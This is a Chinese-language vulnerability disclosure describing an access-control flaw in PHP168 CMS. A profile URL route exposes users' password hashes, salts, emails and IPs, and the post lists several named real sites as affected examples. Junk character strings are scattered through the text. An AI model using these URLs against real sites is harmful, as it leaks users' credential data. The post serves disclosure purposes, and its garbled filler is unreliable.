简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
8 Q" C2 u+ p- y9 ~8 `: x, W4 p' d. Q: A/ D
以PHP168官方演示站点为例,查看任意用户信息的页面链接为:: T5 B0 s# ^* h& H k; m: g- {
\( h% c. U5 T) N7 uhttp://php168.cn/com/homepage.php/admin/member-profile$ q. Z$ W- V( n0 z
0 i" ^; ~' G# L! |+ z
由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。( q3 h, o* D% l. T# J' R
http://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
% K' R- O. W; [- d$ ]1 G+ U8 O/ u4 d! j: A% H+ O# W
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
4 j4 R7 a. u3 J# Q, Q; _
' B" u6 f j: r; e# Thttp://www.zjfzol.com.cn/homepage.php/admin/member-profile
2 i; l9 E4 y& ?; Z0 |5 ]
! Q; v/ M5 v% l3 X1 N7 }% }http://www.scswl.cn/homepage.php/admin/member-profile4 q5 N! j. S% B- r6 Z- a& @
4 p5 q" ~ z6 j6 @, _% w( ehttp://www.tunet.edu.cn/homepage.php/admin/member-profile R/ [% [+ m5 ^- U
: f* j7 j% ~7 c7 l2 vhttp://www.itlead.com.cn/homepage.php/admin/member-profile0 J# p1 |( H, p/ K0 k+ F; m4 b# y' V
( I6 T$ D( Q+ jhttp://www.aedp.cn/homepage.php/admin/member-profile
) x/ z! g: E* U5 `; F, X# M
; d9 @- Z" q; U1 v0 l- V# vhttp://www.qianlongnews.com/homepage.php/test/member-profile4 D/ Y; I) U1 D
( U" Q* p2 ?7 U/ M7 Jhttp://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]' f/ i0 Q* i4 T' X7 w
[/table] |